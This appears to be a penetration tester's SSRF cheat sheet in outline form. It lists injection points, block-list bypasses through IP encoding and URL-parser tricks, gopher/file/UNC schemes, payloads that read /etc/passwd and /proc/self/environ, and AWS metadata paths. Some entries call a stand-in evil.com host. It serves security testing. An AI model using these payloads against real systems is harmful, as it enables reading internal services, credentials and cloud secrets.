1. Attacks
  2. DNS
  3. Schemas
  4. Where to find?
  5. Redirect
  6. Bypass block list
  7. File processing
    1. HTML/PDF/Image Rendering
    2. SSRF via ffmpeg AVI/M3U8
    3. XXE: xml, docx, odt
    4. SSRF via SVG
    5. https://github.com/allanlw/svg-cheatsheet
  8. Reverse Proxies Load Balancers
    1. GET @evil.com HTTP/1.1
    2. Headers: Host, Referer, X-Forwarded-For
    3. Cracking the lens by James Kettle
  9. Brute GET/POST typical SSRF params
  10. ?url=
  11. ?uri=
  12. ?link=
  13. URL preview
  14. Callbacks
  15. Upload image/file by URL
  16. Open Redirect to allowed domain
    1. target.com/?url=http://127.0.0.1
  17. Bypass redirect protection
    1. Check various response codes: 201, 301, 302, 303, 307, 308
  18. Chain of redirects via controlled site
  19. Redirect with scheme changing
    1. Location: gopher://127.0.0.1:11211/_data
  20. HTTP
    1. http:
    2. https:
  21. FTP
    1. ftp:
    2. tftp:
    3. sftp:
  22. UNC Paths
    1. \\127.0.0.1\$C\Windows\win.ini
    2. \\evil.com\share
  23. Other
    1. jar:
    2. dict:
    3. gopher:
    4. ldap:
  24. Java Only
  25. DNS rebinding
    1. Check tool http://1u.ms/
  26. DNS pinning
    1. evil.com -> 127.0.0.1
    2. evil.com -> 169.254.169.254
  27. Bypass restrictions
    1. Internal API
    2. 403 restrictions
    3. Access to admin panel
  28. Attacks on SSRF client
    1. SSRF to XXE
    2. Fingerprint SSRF client
  29. Address encoding
    1. Octal: http://0177.0.0.01
    2. Decimal: http://2130706433/
    3. Hex: http://0x7f.0x0.0x0.0x1
    4. Mixed: http://0177.0x0.0x0.1
  30. Unicode Normalization
    1. http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
  31. URL Parser Logic
    1. http://evil$google.com
    2. http://127.1.1.1:80\@127.2.2.2:80/
    3. http://127.1.1.1:80\@@127.2.2.2:80/
    4. 0://evil.com:80;http://google.com:80/
    5. A New Era Of SSRF Exploiting URL Parser by Orange Tsai
  32. File read
    1. /proc/self/environ
    2. C:/Windows/win.ini
    3. Application log files
    4. Application config files
  33. IPv6 Address
    1. http://[::]:80
    2. http://0000::1:80/
    3. http://::1/server-status
  34. Localhost Representation
    1. http://0/
    2. http://127.1
    3. http://0.0.0.0
    4. http://127.127.127.127
  35. NetNTLM Hash Leakage
  36. Almost deprecated
  37. File read
    1. file:///etc/passwd
    2. netdoc:///etc/passwd
  38. Redirect via controlled site
    1. Location: http://127.0.0.1
  39. If Metadata v1 enabled
  40. Cloud meta API
    1. AWS
      1. 169.254.169.254/latest/user-data
      2. 169.254.169.254/latest/meta-data/hostname
      3. 169.254.169.254/latest/meta-data/ami-id
    2. Check target IP to find out cloud provider
  41. SSRF to XSS
  42. Known public DNS pinnings
    1. localtest.me
    2. 169.254.169.254.xip.io
    3. spoofed.burpcollaborator.net
    4. Find target domain with A 127.0.0.1
  43. Internal network recon
    1. Port scanning using errors or time delay
    2. Fingerprint known HTTP services
    3. Blind SSRF port scanning via DNS
    4. Blind SSRF Exploitation by Wallarm